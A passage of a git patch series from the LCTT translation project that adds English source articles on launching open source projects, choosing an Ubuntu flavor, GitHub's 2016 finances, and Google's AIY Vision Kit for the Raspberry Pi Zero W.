sizes, tech and DevOps workers are choosing to or being asked to launch their own open source projects. From Google to Netflix to Facebook, companies are also releasing their open source creations to the community. It’s become common for open source projects to start from scratch internally, after which they benefit from collaboration involving external developers. + +Launching a project and then rallying community support can be more complicated than you think, however. A little up-front work can help things go smoothly, and that’s exactly where the new guide to[ Starting an Open Source Project][1] comes in. + +This free guide was created to help organizations already versed in open source learn how to start their own open source projects. It starts at the beginning of the process, including deciding what to open source, and moves on to budget and legal considerations, and more. The road to creating an open source project may be foreign, but major companies, from Google to Facebook, have opened up resources and provided guidance. In fact, Google has[ an extensive online destination][2] dedicated to open source best practices and how to open source projects. + +“No matter how many smart people we hire inside the company, there’s always smarter people on the outside,” notes Jared Smith, Open Source Community Manager at Capital One. “We find it is worth it to us to open source and share our code with the outside world in exchange for getting some great advice from people on the outside who have expertise and are willing to share back with us.” + +In the new guide, noted open source expert Ibrahim Haddad provides five reasons why an organization might open source a new project: + +1. Accelerate an open solution; provide a reference implementation to a standard; share development costs for strategic functions + +2. Commoditize a market; reduce prices of non-strategic software components. + +3. Drive demand by building an ecosystem for your products. + +4. Partner with others; engage customers; strengthen relationships with common goals. + +5. Offer your customers the ability to self-support: the ability to adapt your code without waiting for you. + +The guide notes: “The decision to release or create a new open source project depends on your circumstances. Your company should first achieve a certain level of open source mastery by using open source software and contributing to existing projects. This is because consuming can teach you how to leverage external projects and developers to build your products. And participation can bring more fluency in the conventions and culture of open source communities. (See our guides on [Using Open Source Code][3] and [Participating in Open Source Communities][4]) But once you have achieved open source fluency, the best time to start launching your own open source projects is simply ‘early’ and ‘often.’” + +The guide also notes that planning can keep you and your organization out of legal trouble. Issues pertaining to licensing, distribution, support options, and even branding require thinking ahead if you want your project to flourish. + +“I think it is a crucial thing for a company to be thinking about what they’re hoping to achieve with a new open source project,” said John Mertic, Director of Program Management at The Linux Foundation. “They must think about the value of it to the community and developers out there and what outcomes they’re hoping to get out of it. And then they must understand all the pieces they must have in place to do this the right way, including legal, governance, infrastructure and a starting community. Those are the things I always stress the most when you’re putting an open source project out there.” + +The[ Starting an Open Source Project][5] guide can help you with everything from licensing issues to best development practices, and it explores how to seamlessly and safely weave existing open components into your open source projects. It is one of a new collection of free guides from The Linux Foundation and The TODO Group that are all extremely valuable for any organization running an open source program.[ The guides are available][6]now to help you run an open source program office where open source is supported, shared, and leveraged. With such an office, organizations can establish and execute on their open source strategies efficiently, with clear terms. + +These free resources were produced based on expertise from open source leaders.[ Check out all the guides here][7] and stay tuned for our continuing coverage. + +Also, don’t miss the previous articles in the series: + +[How to Create an Open Source Program][8] + +[Tools for Managing Open Source Programs][9] + +[Measuring Your Open Source Program’s Success][10] + +[Effective Strategies for Recruiting Open Source Developers][11] + +[Participating in Open Source Communities][12] + +[Using Open Source Code][13] + +-------------------------------------------------------------------------------- + +via: https://www.linuxfoundation.org/blog/launching-open-source-project-free-guide/ + +作者:[Sam Dean ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linuxfoundation.org/author/sdean/ +[1]:https://www.linuxfoundation.org/resources/open-source-guides/starting-open-source-project/ +[2]:https://www.linux.com/blog/learn/chapter/open-source-management/2017/5/googles-new-home-all-things-open-source-runs-deep +[3]:https://www.linuxfoundation.org/using-open-source-code/ +[4]:https://www.linuxfoundation.org/participating-open-source-communities/ +[5]:https://www.linuxfoundation.org/resources/open-source-guides/starting-open-source-project/ +[6]:https://github.com/todogroup/guides +[7]:https://github.com/todogroup/guides +[8]:https://github.com/todogroup/guides/blob/master/creating-an-open-source-program.md +[9]:https://www.linuxfoundation.org/blog/managing-open-source-programs-free-guide/ +[10]:https://www.linuxfoundation.org/measuring-your-open-source-program-success/ +[11]:https://www.linuxfoundation.org/blog/effective-strategies-recruiting-open-source-developers/ +[12]:https://www.linuxfoundation.org/participating-open-source-communities/ +[13]:https://www.linuxfoundation.org/using-open-source-code/ +[14]:https://www.linuxfoundation.org/author/sdean/ +[15]:https://www.linuxfoundation.org/category/audience/attorneys/ +[16]:https://www.linuxfoundation.org/category/blog/ +[17]:https://www.linuxfoundation.org/category/audience/c-level/ +[18]:https://www.linuxfoundation.org/category/audience/developer-influencers/ +[19]:https://www.linuxfoundation.org/category/audience/entrepreneurs/ +[20]:https://www.linuxfoundation.org/category/content-placement/lf-brand/ +[21]:https://www.linuxfoundation.org/category/audience/open-source-developers/ +[22]:https://www.linuxfoundation.org/category/audience/open-source-professionals/ +[23]:https://www.linuxfoundation.org/category/audience/open-source-users/ From e02f586d98893128509cb347e832e03c9971eea2 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sat, 9 Dec 2017 16:03:28 +0800 Subject: [PATCH 0450/1627] =?UTF-8?q?20171209-17=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... Official Ubuntu Flavor Is Best for You.md | 168 ++++++++++++++++++ 1 file changed, 168 insertions(+) create mode 100644 sources/tech/20170512 Which Official Ubuntu Flavor Is Best for You.md diff --git a/sources/tech/20170512 Which Official Ubuntu Flavor Is Best for You.md b/sources/tech/20170512 Which Official Ubuntu Flavor Is Best for You.md new file mode 100644 index 0000000000..960f75034f --- /dev/null +++ b/sources/tech/20170512 Which Official Ubuntu Flavor Is Best for You.md @@ -0,0 +1,168 @@ +Which Official Ubuntu Flavor Is Best for You? +============================================================ + + +![Ubuntu Budgie](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/ubuntu_budgie.jpg?itok=xpo3Ujfw "Ubuntu Budgie") +Ubuntu Budgie is just one of the few officially recognized flavors of Ubuntu. Jack Wallen takes a look at some important differences between them.[Used with permission][7] + +Ubuntu Linux comes in a few officially recognized flavors, as well as several derivative distributions. The recognized flavors are: + +* [Kubuntu][9] - Ubuntu with the KDE desktop + +* [Lubuntu][10] - Ubuntu with the LXDE desktop + +* [Mythbuntu][11] - Ubuntu MythTV + +* [Ubuntu Budgie][12] - Ubuntu with the Budgie desktop + +* [Xubuntu][8] - Ubuntu with Xfce + +Up until recently, the official Ubuntu Linux included the in-house Unity desktop and a sixth recognized flavor existed: Ubuntu GNOME -- Ubuntu with the GNOME desktop environment. + +When Mark Shuttleworth decided to nix Unity, the choice was obvious to Canonical—make GNOME the official desktop of Ubuntu Linux. This begins with Ubuntu 18.04 (so April, 2018) and we’ll be down to the official distribution and four recognized flavors. + +For those already enmeshed in the Linux community, that’s some seriously simple math to do—you know which Linux desktop you like, so making the choice between Ubuntu, Kubuntu, Lubuntu, Mythbuntu, Ubuntu Budgie, and Xubuntu couldn’t be easier. Those that haven’t already been indoctrinated into the way of Linux won’t see that as such a cut-and-dried decision. + +To that end, I thought it might be a good idea to help newer users decide which flavor is best for them. After all, choosing the wrong distribution out of the starting gate can make for a less-than-ideal experience. + +And so, if you’re considering a flavor of Ubuntu, and you want your experience to be as painless as possible, read on. + +### Ubuntu + +I’ll begin with the official flavor of Ubuntu. I am also going to warp time a bit and skip Unity, to launch right into the upcoming GNOME-based distribution. Beyond GNOME being an incredibly stable and easy to use desktop environment, there is one very good reason to select the official flavor—support. The official flavor of Ubuntu is commercially supported by Canonical. For $150.00 per year, you can purchase [official support][20] for the Ubuntu desktop. There is, of course, a 50-desktop minimum for this level of support. For individuals, the best bet for support would be the [Ubuntu Forums][21], the [Ubuntu documentation][22], or the [Community help wiki][23]. + +Beyond the commercial support, the reason to choose the official Ubuntu flavor would be if you’re looking for a modern, full-featured desktop that is incredibly reliable and easy to use. GNOME has been designed to serve as a platform perfectly suited for both desktops and laptops (Figure 1). Unlike its predecessor, Unity, GNOME can be far more easily customized to suit your needs—to a point. If you’re not one to tinker with the desktop, fear not, GNOME just works. In fact, the out of the box experience with GNOME might well be one of the finest on the market—even rivaling (or besting) Mac OS X. If tinkering and tweaking is of primary interest, you will find GNOME somewhat limiting. The [GNOME Tweak Tool][24] and [GNOME Shell Extensions ][25]will only take you so far, before you find yourself wanting more. + + +![GNOME desktop](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/ubuntu_flavor_a.jpg?itok=Ir6jBKbd "GNOME desktop") + +Figure 1: The GNOME desktop with a Unity-like flavor might be what we see with Ubuntu 18.04.[Used with permission][1] + +### Kubuntu + +The [K Desktop Environment][26] (otherwise known as KDE) has been around as long as GNOME and has, at times, been maligned as a lesser desktop. With the release of KDE Plasma 5, that changed. KDE has become an incredibly powerful, efficient, and stable desktop that can stand toe to toe with the best of them. But why would you select Kubuntu over the official Ubuntu? The answer to that question is quite simple—you’re used to the Windows XP/7 desktop metaphor. Start menu, taskbar, system tray, etc., KDE has those and more, all fashioned in such a way that will make you feel like you’re using the best of the past and current technologies. In fact, if you’re looking for one of the most Windows 7-like official Ubuntu flavors, you won’t find one that better fits the bill. + +One of the nice things about Kubuntu, is that you’ll find it a bit more flexible than any Windows iteration you’ve ever used—and equally reliable/user-friendly. And don’t think, because KDE opts to offer a desktop somewhat similar to Windows 7, that it doesn’t have a modern flavor. In fact, Kubuntu takes what worked well with the Windows 7 interface and updates it to meet a more modern aesthetic (Figure 2). + + +![Kubuntu](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/ubuntu_flavor_b.jpg?itok=dGpebi4z "Kubuntu") + +Figure 2: Kubuntu offers a modern take on an old UX.[Used with permission][2] + +The official Ubuntu is not the only flavor to offer desktop support. Kubuntu users also can pay for [commercial support][27]. Be warned, it’s not cheap. One hour of support time will cost you $103.88 cents. + +### Lubuntu + +If you’re looking for an easy-to-use desktop that is very fast (so that older hardware will feel like new) and far more flexible than just about any desktop you’ve ever used, Lubuntu is what you want. The only caveat to Lubuntu is that you’re looking at a bit more bare bones on the desktop then you may be accustomed to. Lubuntu makes use of the [LXDE desktop][28] and includes a list of applications that continues the lightweight theme. So if you’re looking for blazing fast speeds on the desktop, Lubuntu might be a good choice. +However, there is a caveat with Lubuntu and, for some users, this might be a deal breaker. Along with the small footprint of Lubuntu come pre-installed applications that might not stand up to task. For example, instead of the full-blown office suite, you’ll find the [AibWord word processor][29] and the [Gnumeric spreadsheet][30] tool. Don’t get me wrong; both of these are fine tools. However, if you’re looking for software that’s business-ready, you will find them lacking. On the other hand, if you want to install more work-centric tools (e.g., LibreOffice), Lubuntu includes the Synaptic Package Manager to make installation of third-party software simple. + +Even with the limited default software, Lubuntu offers a clean and easy to use desktop (Figure 3), that anyone could start using with little to no learning curve. + + +![Lubuntu](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/ubuntu_flavor_c.jpg?itok=nWsJr39r "Lubuntu") + +Figure 3: What Lubuntu lacks in software, it makes up for in speed and simplicity.[Used with permission][3] + +### Mythbuntu + +Mythbuntu is a sort of odd bird here, because it isn’t really a desktop variant. Instead, Mythbuntu is a special flavor of Ubuntu designed to be a multimedia powerhouse. Using Mythbuntu requires TV Tuners and TV Out cards. And, during the installation, there are a number of additional steps that must be taken (choosing how to set up the frontend/backend as well as setting up your IR remotes). + +If you do happen to have the hardware (and the desire to create your own Ubuntu-powered entertainment system), Mythbuntu is the distribution you want. Once you’ve installed Mythbuntu, you will then be prompted to walk through the setup of your Capture cards, recording profiles, video sources, and Input connections (Figure 4). + + +![Mythbuntu](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/ubuntu_flavor_d.jpg?itok=Uk16xUIF "Mythbuntu") + +Figure 4: Getting ready to set up Mythbuntu.[Used with permission][4] + +### Ubuntu Budgie + +Ubuntu Budgie is the new kid on the block to the official flavor list. Sporting the Budgie Desktop, this is a beautiful and modern take on Linux that will please just about any type of user. The goal of Ubuntu Budgie was to create an elegant and simple desktop interface. Mission accomplished. If you’re looking for a beautiful desktop to work on top of the remarkably stable Ubuntu Linux platform, look no further than Ubuntu Budgie. + +Adding this particular spin on Ubuntu to the list of official variants was a smart move on the part of Canonical. With Unity going away, they needed a desktop that would offer the elegance found in Unity. Customization of Budgie is very easy, and the list of included software will get you working and browsing immediately. + +And, unlike the learning curve many users encountered with Unity, the developers/designers of Ubuntu Budgie have done a remarkable job of keeping this take on Ubuntu familiar. Click on the “start” button to reveal a fairly standard menu of applications. Budgie also includes an easy to use Dock (Figure 5) that holds applications launchers for quick access. + + +![Budgie](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/ubuntu_flavor_e.jpg?itok=mwlo4xzm "Budgie") + +Figure 5: This is one beautiful desktop.[Used with permission][5] + +Another really nice feature found in Ubuntu Budgie is a sidebar that can be quickly revealed and hidden. This sidebar holds applets and notifications. With this in play, your desktop can be both incredibly useful, while remaining clutter free. + +In the end, if you’re looking for something a bit different, that happens to also be a very modern take on the desktop—with features and functions not found on other distributions—Ubuntu Budgie is what you’re looking for. + +### Xubuntu + +Another official flavor of Ubuntu that does a nice job of providing a small footprint version of Linux is [Xubuntu][32]. The difference between Xubuntu and Lubuntu is that, where Lubuntu uses the LXDE desktop, Xubuntu makes use of [Xfce][33]. What you get with that difference is a lightweight desktop that is far more configurable (than Lubuntu) as well as one that includes the more business-ready LibreOffice office suite. + +Xubuntu is an out of the box experience that anyone, regardless of experience, can use. But don't think that immediate familiarity means this flavor of Ubuntu is locked out of making it your own. If you're looking for a take on Ubuntu that's somewhat old-school out of the box, but can be heavily tweaked to better resemble a more modern desktop, Xubuntu is what you want. + +One really handy addition to Xubuntu that I've always enjoyed (one that harks back to Enlightenment) is the ability to bring up the "start" menu by right-clicking anywhere on the desktop (Figure 6). This can make for very efficient usage. + + +![Xubuntu](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/xubuntu.jpg?itok=XL8_hLet "Xubuntu") + +Figure 6: Xubuntu lets you bring up the "start" menu by right-clicking anywhere on the desktop.[Used with permission][6] + +### The choice is yours + +There is a flavor of Ubuntu to meet nearly any need—which one you choose is up to you. As yourself questions such as: + +* What are your needs? + +* What type of desktop do you prefer to interact with? + +* Is your hardware aging? + +* Do you prefer a Windows XP/7 feel? + +* Are you wanting a multimedia system? + +Your answers to the above questions will go a long way to determining which flavor of Ubuntu is right for you. The good news is that you can’t really go wrong with any of the available options. + + _Learn more about Linux through the free ["Introduction to Linux" ][31]course from The Linux Foundation and edX._ + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/learn/intro-to-linux/2017/5/which-official-ubuntu-flavor-best-you + +作者:[ JACK WALLEN][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linux.com/users/jlwallen +[1]:https://www.linux.com/licenses/category/used-permission +[2]:https://www.linux.com/licenses/category/used-permission +[3]:https://www.linux.com/licenses/category/used-permission +[4]:https://www.linux.com/licenses/category/used-permission +[5]:https://www.linux.com/licenses/category/used-permission +[6]:https://www.linux.com/licenses/category/used-permission +[7]:https://www.linux.com/licenses/category/used-permission +[8]:http://xubuntu.org/ +[9]:http://www.kubuntu.org/ +[10]:http://lubuntu.net/ +[11]:http://www.mythbuntu.org/ +[12]:https://ubuntubudgie.org/ +[13]:https://www.linux.com/files/images/ubuntuflavorajpg +[14]:https://www.linux.com/files/images/ubuntuflavorbjpg +[15]:https://www.linux.com/files/images/ubuntuflavorcjpg +[16]:https://www.linux.com/files/images/ubuntuflavordjpg +[17]:https://www.linux.com/files/images/ubuntuflavorejpg +[18]:https://www.linux.com/files/images/xubuntujpg +[19]:https://www.linux.com/files/images/ubuntubudgiejpg +[20]:https://buy.ubuntu.com/collections/ubuntu-advantage-for-desktop +[21]:https://ubuntuforums.org/ +[22]:https://help.ubuntu.com/?_ga=2.155705979.1922322560.1494162076-828730842.1481046109 +[23]:https://help.ubuntu.com/community/CommunityHelpWiki?_ga=2.155705979.1922322560.1494162076-828730842.1481046109 +[24]:https://apps.ubuntu.com/cat/applications/gnome-tweak-tool/ +[25]:https://extensions.gnome.org/ +[26]:https://www.kde.org/ +[27]:https://kubuntu.emerge-open.com/buy +[28]:http://lxde.org/ +[29]:https://www.abisource.com/ +[30]:http://www.gnumeric.org/ +[31]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux +[32]:https://xubuntu.org/ +[33]:https://www.xfce.org/ From 70194d29757054b78146c4e410616dde0128f2bf Mon Sep 17 00:00:00 2001 From: Ezio Date: Sat, 9 Dec 2017 16:06:13 +0800 Subject: [PATCH 0451/1627] =?UTF-8?q?20171209-18=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...216 GitHub Is Building a Coder Paradise.md | 67 +++++++++++++++++++ 1 file changed, 67 insertions(+) create mode 100644 sources/tech/20161216 GitHub Is Building a Coder Paradise.md diff --git a/sources/tech/20161216 GitHub Is Building a Coder Paradise.md b/sources/tech/20161216 GitHub Is Building a Coder Paradise.md new file mode 100644 index 0000000000..36e9e76343 --- /dev/null +++ b/sources/tech/20161216 GitHub Is Building a Coder Paradise.md @@ -0,0 +1,67 @@ +GitHub Is Building a Coder’s Paradise. It’s Not Coming Cheap +============================================================ + +The VC-backed unicorn startup lost $66 million in nine months of 2016, financial documents show. + + +Though the name GitHub is practically unknown outside technology circles, coders around the world have embraced the software. The startup operates a sort of Google Docs for programmers, giving them a place to store, share and collaborate on their work. But GitHub Inc. is losing money through profligate spending and has stood by as new entrants emerged in a software category it essentially gave birth to, according to people familiar with the business and financial paperwork reviewed by Bloomberg. + +The rise of GitHub has captivated venture capitalists. Sequoia Capital led a $250 million investment in mid-2015\. But GitHub management may have been a little too eager to spend the new money. The company paid to send employees jetting across the globe to Amsterdam, London, New York and elsewhere. More costly, it doubled headcount to 600 over the course of about 18 months. + +GitHub lost $27 million in the fiscal year that ended in January 2016, according to an income statement seen by Bloomberg. It generated $95 million in revenue during that period, the internal financial document says. + +![Chris Wanstrath, co-founder and chief executive officer at GitHub Inc., speaks during the 2015 Bloomberg Technology Conference in San Francisco, California, U.S., on Tuesday, June 16, 2015\. The conference gathers global business leaders, tech influencers, top investors and entrepreneurs to shine a spotlight on how coders and coding are transforming business and fueling disruption across all industries. Photographer: David Paul Morris/Bloomberg *** Local Caption *** Chris Wanstrath](https://assets.bwbx.io/images/users/iqjWHBFdfxIU/iXpmtRL9Q0C4/v0/400x-1.jpg) +GitHub CEO Chris Wanstrath.Photographer: David Paul Morris/Bloomberg + +Sitting in a conference room featuring an abstract art piece on the wall and a Mad Men-style rollaway bar cart in the corner, GitHub’s Chris Wanstrath says the business is running more smoothly now and growing. “What happened to 2015?” says the 31-year-old co-founder and chief executive officer. “Nothing was getting done, maybe? I shouldn’t say that. Strike that.” + +GitHub recently hired Mike Taylor, the former treasurer and vice president of finance at Tesla Motors Inc., to manage spending as chief financial officer. It also hopes to add a seasoned chief operating officer. GitHub has already surpassed last year’s revenue in nine months this year, with $98 million, the financial document shows. “The whole product road map, we have all of our shit together in a way that we’ve never had together. I’m pretty elated right now with the way things are going,” says Wanstrath. “We’ve had a lot of ups and downs, and right now we’re definitely in an up.” + +Also up: expenses. The income statement shows a loss of $66 million in the first three quarters of this year. That’s more than twice as much lost in any nine-month time frame by Twilio Inc., another maker of software tools founded the same year as GitHub. At least a dozen members of GitHub’s leadership team have left since last year, several of whom expressed unhappiness with Wanstrath’s management style. GitHub says the company has flourished under his direction but declined to comment on finances. Wanstrath says: “We raised $250 million last year, and we’re putting it to use. We’re not expecting to be profitable right now.” + +Wanstrath started GitHub with three friends during the recession of 2008 and bootstrapped the business for four years. They encouraged employees to [work remotely][1], which forced the team to adopt GitHub’s tools for their own projects and had the added benefit of saving money on office space. GitHub quickly became essential to the code-writing process at technology companies of all sizes and gave birth to a new generation of programmers by hosting their open-source code for free. + +Peter Levine, a partner at Andreessen Horowitz, courted the founders and eventually convinced them to take their first round of VC money in 2012\. The firm led a $100 million cash infusion, and Levine joined the board. The next year, GitHub signed a seven-year lease worth about $35 million for a headquarters in San Francisco, says a person familiar with the project. + +The new digs gave employees a reason to come into the office. Visitors would enter a lobby modeled after the White House’s Oval Office before making their way to a replica of the Situation Room. The company also erected a statue of its mascot, a cartoon octopus-cat creature known as the Octocat. The 55,000-square-foot space is filled with wooden tables and modern art. + +In GitHub’s cultural hierarchy, the coder is at the top. The company has strived to create the best product possible for software developers and watch them to flock to it. In addition to offering its base service for free, GitHub sells more advanced programming tools to companies big and small. But it found that some chief information officers want a human touch and began to consider building out a sales team. + +The issue took on a new sense of urgency in 2014 with the formation of a rival startup with a similar name. GitLab Inc. went after large businesses from the start, offering them a cheaper alternative to GitHub. “The big differentiator for GitLab is that it was designed for the enterprise, and GitHub was not,” says GitLab CEO Sid Sijbrandij. “One of the values is frugality, and this is something very close to our heart. We want to treat our team members really well, but we don’t want to waste any money where it’s not needed. So we don’t have a big fancy office because we can be effective without it.” + +Y Combinator, a Silicon Valley business incubator, welcomed GitLab into the fold last year. GitLab says more than 110,000 organizations, including IBM and Macy’s Inc., use its software. (IBM also uses GitHub.) Atlassian Corp. has taken a similar top-down approach with its own code repository Bitbucket. + +Wanstrath says the competition has helped validate GitHub’s business. “When we started, people made fun of us and said there is no money in developer tools,” he says. “I’ve kind of been waiting for this for a long time—to be proven right, that this is a real market.” + +![GitHub_Office-03](https://assets.bwbx.io/images/users/iqjWHBFdfxIU/iQB5sqXgihdQ/v0/400x-1.jpg) +Source: GitHub + +It also spurred GitHub into action. With fresh capital last year valuing the company at $2 billion, it went on a hiring spree. It spent $71 million on salaries and benefits last fiscal year, according to the financial document seen by Bloomberg. This year, those costs rose to $108 million from February to October, with three months still to go in the fiscal year, the document shows. This was the startup’s biggest expense by far. + +The emphasis on sales seemed to be making an impact, but the team missed some of its targets, says a person familiar with the matter. In September 2014, subscription revenue on an annualized basis was about $25 million each from enterprise sales and organizations signing up through the site, according to another financial document. After GitHub staffed up, annual recurring revenue from large clients increased this year to $70 million while the self-service business saw healthy, if less dramatic, growth to $52 million. + +But the uptick in revenue wasn’t keeping pace with the aggressive hiring. GitHub cut about 20 employees in recent weeks. “The unicorn trap is that you’ve sold equity against a plan that you often can’t hit; then what do you do?” says Nick Sturiale, a VC at Ignition Partners. + +Such business shifts are risky, and stumbles aren’t uncommon, says Jason Lemkin, a corporate software VC who’s not an investor in GitHub. “That transition from a self-service product in its early days to being enterprise always has bumps,” he says. GitHub says it has 18 million users, and its Enterprise service is used by half of the world’s 10 highest-grossing companies, including Wal-Mart Stores Inc. and Ford Motor Co. + +Some longtime GitHub fans weren’t happy with the new direction, though. More than 1,800 developers signed an online petition, saying: “Those of us who run some of the most popular projects on GitHub feel completely ignored by you.” + +The backlash was a wake-up call, Wanstrath says. GitHub is now more focused on its original mission of catering to coders, he says. “I want us to be judged on, ‘Are we making developers more productive?’” he says. At GitHub’s developer conference in September, Wanstrath introduced several new features, including an updated process for reviewing code. He says 2016 was a “marquee year.” + + +At least five senior staffers left in 2015, and turnover among leadership continued this year. Among them was co-founder and CIO Scott Chacon, who says he left to start a new venture. “GitHub was always very good to me, from the first day I started when it was just the four of us,” Chacon says. “They allowed me to travel the world representing them; they supported my teaching and evangelizing Git and remote work culture for a long time.” + +The travel excursions are expected to continue at GitHub, and there’s little evidence it can rein in spending any time soon. The company says about half its staff is remote and that the trips bring together GitHub’s distributed workforce and encourage collaboration. Last week, at least 20 employees on GitHub’s human-resources team convened in Rancho Mirage, California, for a retreat at the Ritz Carlton. + +-------------------------------------------------------------------------------- + +via: https://www.bloomberg.com/news/articles/2016-12-15/github-is-building-a-coder-s-paradise-it-s-not-coming-cheap + +作者:[Eric Newcomer ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.bloomberg.com/authors/ASFMS16EsvU/eric-newcomer +[1]:https://www.bloomberg.com/news/articles/2016-09-06/why-github-finally-abandoned-its-bossless-workplace From eecab508e8e9fab95738192d47e1ad31a565c5da Mon Sep 17 00:00:00 2001 From: Ezio Date: Sat, 9 Dec 2017 16:08:39 +0800 Subject: [PATCH 0452/1627] =?UTF-8?q?20171209-19=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...d vision recognition kit for RPi Zero W.md | 85 +++++++++++++++++++ 1 file changed, 85 insertions(+) create mode 100644 sources/tech/20171130 Google launches TensorFlow-based vision recognition kit for RPi Zero W.md diff --git a/sources/tech/20171130 Google launches TensorFlow-based vision recognition kit for RPi Zero W.md b/sources/tech/20171130 Google launches TensorFlow-based vision recognition kit for RPi Zero W.md new file mode 100644 index 0000000000..5bf32964e4 --- /dev/null +++ b/sources/tech/20171130 Google launches TensorFlow-based vision recognition kit for RPi Zero W.md @@ -0,0 +1,85 @@ +# [Google launches TensorFlow-based vision recognition kit for RPi Zero W][26] + + +![](http://linuxgizmos.com/files/google_aiyvisionkit-thm.jpg) +Google’s $45 “AIY Vision Kit” for the Raspberry Pi Zero W performs TensorFlow-based vision recognition using a “VisionBonnet” board with a Movidius chip. + +Google’s AIY Vision Kit for on-device neural network acceleration follows an earlier [AIY Projects][7] voice/AI kit for the Raspberry Pi that shipped to MagPi subscribers back in May. Like the voice kit and the older Google Cardboard VR viewer, the new AIY Vision Kit has a cardboard enclosure. The kit differs from the [Cloud Vision API][8], which was demo’d in 2015 with a Raspberry Pi based GoPiGo robot, in that it runs entirely on local processing power rather than requiring a cloud connection. The AIY Vision Kit is available now for pre-order at $45, with shipments due in early December. + + + [![](http://linuxgizmos.com/files/google_aiyvisionkit-sm.jpg)][9]   [![](http://linuxgizmos.com/files/rpi_zerow-sm.jpg)][10] +**AIY Vision Kit, fully assembled (left) and Raspberry Pi Zero W** +(click images to enlarge) + + +The kit’s key processing element, aside from the 1GHz ARM11-based Broadcom BCM2836 SoC found on the required [Raspberry Pi Zero W][21] SBC, is Google’s new VisionBonnet RPi accessory board. The VisionBonnet pHAT board uses a Movidius MA2450, a version of the [Movidius Myriad 2 VPU][22] processor. On the VisionBonnet, the processor runs Google’s open source [TensorFlow][23]machine intelligence library for neural networking. The chip enables visual perception processing at up to 30 frames per second. + +The AIY Vision Kit requires a user-supplied RPi Zero W, a [Raspberry Pi Camera v2][11], and a 16GB micro SD card for downloading the Linux-based image. The kit includes the VisionBonnet, an RGB arcade-style button, a piezo speaker, a macro/wide lens kit, and the cardboard enclosure. You also get flex cables, standoffs, a tripod mounting nut, and connecting components. + + + [![](http://linuxgizmos.com/files/google_aiyvisionkit_pieces-sm.jpg)][12]   [![](http://linuxgizmos.com/files/google_visionbonnet-sm.jpg)][13] +**AIY Vision Kit kit components (left) and VisonBonnet accessory board** +(click images to enlarge) + + +Three neural network models are available. There’s a general-purpose model that can recognize 1,000 common objects, a facial detection model that can also score facial expression on a “joy scale” that ranges from “sad” to “laughing,” and a model that can identify whether the image contains a dog, cat, or human. The 1,000-image model derives from Google’s open source [MobileNets][24], a family of TensorFlow based computer vision models designed for the restricted resources of a mobile or embedded device. + +MobileNet models offer low latency and low power consumption, and are parameterized to meet the resource constraints of different use cases. The models can be built for classification, detection, embeddings, and segmentation, says Google. Earlier this month, Google released a developer preview of a mobile-friendly [TensorFlow Lite][14] library for Android and iOS that is compatible with MobileNets and the Android Neural Networks API. + + + [![](http://linuxgizmos.com/files/google_aiyvisionkit_assembly-sm.jpg)][15] +**AIY Vision Kit assembly views** +(click image to enlarge) + + +In addition to providing the three models, the AIY Vision Kit provides basic TensorFlow code and a compiler, so users can develop their own models. In addition, Python developers can write new software to customize RGB button colors, piezo element sounds, and 4x GPIO pins on the VisionBonnet that can add additional lights, buttons, or servos. Potential models include recognizing food items, opening a dog door based on visual input, sending a text when your car leaves the driveway, or playing particular music based on facial recognition of a person entering the camera’s viewpoint. + + + [![](http://linuxgizmos.com/files/movidius_myriad2vpu_block-sm.jpg)][16]   [![](http://linuxgizmos.com/files/movidius_myriad2_reference_board-sm.jpg)][17] +**Myriad 2 VPU block diagram (left) and reference board** +(click image to enlarge) + + +The Movidius Myriad 2 processor provides TeraFLOPS of performance within a nominal 1 Watt power envelope. The chip appeared on early Project Tango reference platforms, and is built into the Ubuntu-driven [Fathom][25] neural processing USB stick that Movidius debuted in May 2016, prior to being acquired by Intel. According to Movidius, the Myriad 2 is available “in millions of devices on the market today.” + +**Further information** + +The AIY Vision Kit is available for pre-order from Micro Center at $44.99, with shipments due in early December. More information may be found in the AIY Vision Kit [announcement][18], [Google Blog notice][19], and [Micro Center shopping page][20]. + +-------------------------------------------------------------------------------- + +via: http://linuxgizmos.com/google-launches-tensorflow-based-vision-recognition-kit-for-rpi-zero-w/ + +作者:[ Eric Brown][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://linuxgizmos.com/google-launches-tensorflow-based-vision-recognition-kit-for-rpi-zero-w/ +[1]:http://twitter.com/share?url=http://linuxgizmos.com/google-launches-tensorflow-based-vision-recognition-kit-for-rpi-zero-w/&text=Google%20launches%20TensorFlow-based%20vision%20recognition%20kit%20for%20RPi%20Zero%20W%20 +[2]:https://plus.google.com/share?url=http://linuxgizmos.com/google-launches-tensorflow-based-vision-recognition-kit-for-rpi-zero-w/ +[3]:http://www.facebook.com/sharer.php?u=http://linuxgizmos.com/google-launches-tensorflow-based-vision-recognition-kit-for-rpi-zero-w/ 